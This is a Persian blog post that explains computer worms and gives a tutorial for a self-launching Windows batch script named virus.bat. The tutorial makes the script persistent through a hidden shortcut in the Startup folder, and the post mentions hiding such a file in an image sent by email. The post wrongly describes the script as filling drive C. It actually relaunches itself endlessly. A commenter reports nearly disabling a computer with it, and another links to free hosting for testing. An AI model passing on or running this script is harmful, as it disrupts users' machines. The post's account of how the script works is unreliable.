کرم کامپیوتر چیست و چگونه یک برنامه کرم ساده بنویسیم؟

کرم کامپیوتر چیست:

کرم کامپیوتر زیر مجموعه نرم‌افزار و برنامه مخرب محسوب می‌شود، یک برنامه کامپیوتری است و با کپی کردن یا تولید مثل خودش سیستم را به گونه‌ای مختل می‌کند. برخی کرم‌ها از طریق شبکه هم منتقل می‌شوند و می‌توانند به کامپیوترهای دیگر هم نفوذ کنند. در واقع کرم‌های کامپیوتر، فضا، پهنای باند و منابع را استفاده می‌کنند.

 توجه داشته باشید هدف ما از نوشتن این مطلب تشویق مخاطبان برای نوشتن فایل‌های مخرب و توزیع آنها نیست! ما به دنبال افزایش آگاهی هستیم. به شما توصیه می‌کنیم اگر هدفتان یادگیری نوشتن کرم و توزیع آن روی دستگاه‌های دیگران است، دوباره فکر کنید.

نوشتن یک کرم کامپیوتر ساده : 

در این قسمت با هم یک کرم کامپیوتر ساده را می‌نویسیم. این برنامه روی سیستم عامل ویندوز اجرا می‌شود. در نظر داشته باشید که کرم‌ها مانند ویروس نیستند و خودشان اجرا میشوند.

۱- با حساب کاربری مدیر وارد کامپیوترتان شوید.

۲- در یک درایو مانند C، یک پوشه به نام Programs بسازید.

۳- ویرایشگر متنی مانند Notepad را باز کرده و دستورات زیر را در آن وارد کنید :

۱
۲
۳
@echo off
Copy C:\Programs\virus.bat C:\Programs
Start C:\Programs\virus.bat

۴- از منوی فایل، گزینه Save as را انتخاب و فایل را ذخیره کنید. نکته: نام فایل virus و پسوند فایل را bat قرار دهید، مسیر فایل در پوشه Programs در درایو C باید باشد و مطمئن شوید گزینه Save as type را روی All file تنظیم کرده باشید.

۵-  اگر می‌خواهید با بالا آمدن سیستم عامل، کرم شروع به کپی کردن خودش کند، روی فایل virus.bat کلیک راست کرده و گزینه Shortcut را انتخاب کنید.

۶- روی فایل shortcut ایجاد شده کلیک راست کرده و روی Cut کلیک کنید، سپس دوباره کلیک راست کرده و روی Copy کلیک کنید.

۷-  از منوی استارت سیستم عامل روی All Programs کلیک و پوشه startup را پیدا کنید.

۸- در پوشه Startup، فایل میانبری که کپی کرده بودید را paste کنید.

۹- در این پوشه روی فایل میانبر کلیک راست کرده و گزینه properties را انتخاب کنید. چک‌باکس hidden را پیدا و آن را تیک بزنید و سپس روی OK یا Apply کلیک کنید.

۱۰- تمام شد، کافی است سیستم عامل را دوباره راه‌اندازی (Restart) کنید. وقتی ویندوز بالا آمد، کرم شروع به اجرا شدن می‌کند و کل فضای درایو C را اشغال می‌کند.

۱۱- برای خلاص شدن از دست این کرم کامپیوتر کافی است پوشه Programs در درایو C را پاک کنید.

اکنون ما می‌دانیم که یک کرم کامپیوتر چطور کار میکند. اشخاص مخرب همین فایل را می‌توانند درون یک فایل تصویری مخفی و آن را از طریق ایمیل برای هدف خود ارسال کنند. اگر مهارت برنامه‌نویسی داشته باشند می‌توانند با تغییراتی در همین فایل، کاری کنند که کرم از طریق ایمیل قربانی به ایمیل‌های دیگر نیز ارسال شود. به همین دلایل است که همیشه توصیه می‌کنیم مراقب ایمیل‌هایی که از آشنا و نا آشنا دریافت می‌کنید باشید.

مطالب مرتبط

۲ دیدگاه‌

  1. ali گفت:

    اووووف
    عجب چیزی، امتحان کردم (البته یکم تغییر دادم کد رو چون ریپلیس میکرد) ولی کامپیوترم داشت به فنا میرف…
    خوب شد تو startup ننداختمش وگرنه ریستارت میکردم درست نمیشد، تو startup ترجیها نندازین

  2. مائده شفیعی گفت:

    http://b6b.ir
    هاست رایگان راحت باهاش میشه وبلاگ ساخت و اینا رو روش تست کرد

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *